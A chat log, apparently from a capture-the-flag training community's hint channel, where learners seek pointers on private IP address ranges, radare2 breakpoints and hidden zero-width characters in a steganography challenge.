I already knew the question without having to go look at what it asked haha
It just wants the answer in decimal
😩
Lol thanks @oblique cliff
Place breakpoints and check out what it’s doing to your input @thin sorrel
No need to ask more than once @white salmon
ok cool ... soory
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@white salmon
sorry*
What does the question say?
oups ... sorry i didn't want to spoil
Have you tried googling common home network address ranges?
the thing is the format for the answer doesn't match
@oblique cliff
of course i tried
the answer is supposed to be in 3characters. 3 characters. 1 char . 1char
And there are many numbers that can match that
You can either brute force it or you can research and try to find an answer that fits that format
hummmm if I'm allowed to do that .. ok I'll try
Allowed to do what? You can google
Don’t brute force it. ~~ I guess you can but it’ll take awhile~~
brute force for the answer
Don’t brute force it. I guess you can but it’ll take awhile
@oblique cliff Cloudflare will kill you
😆
@oblique cliff how do i continue analysis after hitting a breakpoint
Edited 👀
The room tells you how to do that
You can also google r2 commands
Or use the ? Operator
To see how to use different commands
ok never mind ... any hint for a google research?
@oblique cliff
yes I did
You’ll find it eventually I believe in you
Try private IP address ranges
Or something along those lines
the 5th question already took the only possible answer for this format .... it's a class C address so we don't have so much choice ...
for a private range
Correct
/16?
No that changes the reserved network address length
is it possible to get help with "Help Bears" yet? it appears the room has been deleted now and it has been 5 days since it was released. If it is not possible to complete the room now (due to being deleted) I want to know how close I got to solving it
@agile whale sure what’s up
@white salmon on the same /24 what’s the next subnet after the first one is used up?
@agile whale It's been made private, rather than deleted
do I need to worry about giving spoilers away with the room?
let me google that ...i'm coming
@oblique cliff after adding breakpoints and examining the variables I noticed it added s3*****d to the password
I'm lost from there
Sure thing
@stuck fractal OK. the first 2 flags were easy, I decoded them, then got stuck on the last flag. after some google foo, I found out the bears were doing the rootme webclient (questions were identical, not even changed from messages French to English) but this event did not have a 25char flag, then after a day discarded that the first flags linked to the last flag, did stego on the room description, found 2 more passwords, but the password I have left is one 8char long but the flag is 25char long. not sure where to use the flag. Have tried using the flag format to create 2 more passwords but it comes to about 22char which is still too short for the last flag, I kinda feel like I am just guessing and that there is some info somewhere that I am missing
So, there's more to the text file than what you can see
James did everyone who did that room get the points removed?
Probably, as it was made private
I have opened them in hex editors and binwalk, there is nothing hidden for me, have even checked for ADS
Zero width
Hmmm i do get them
I have a tool link
I'll drop it out of context in #resources
The link has absolutely zero relation to the room
Don't worry
OK I'm fed up ... I can't find an answer for this question ... what did I miss?
I've been on this one question for 2 hours, I've finished everything else ... it's discouraging
You know what range it belongs to
And you know 192.168.0.0/24 only changes the last octet
There's 254 or so other address ranges there
ok ... ???
how to delete
.... never mind ... I still don't get it
if i change anything it will not be private anymore
..... coming ...................
James, I have just rechecked the files I have and do not see anything hidden in the text, no unprintable characters. I can't re-download the source files to double check them, but these are the ones I have, shouldn't I be able to see unprintable/zero width characters in a hex editor?
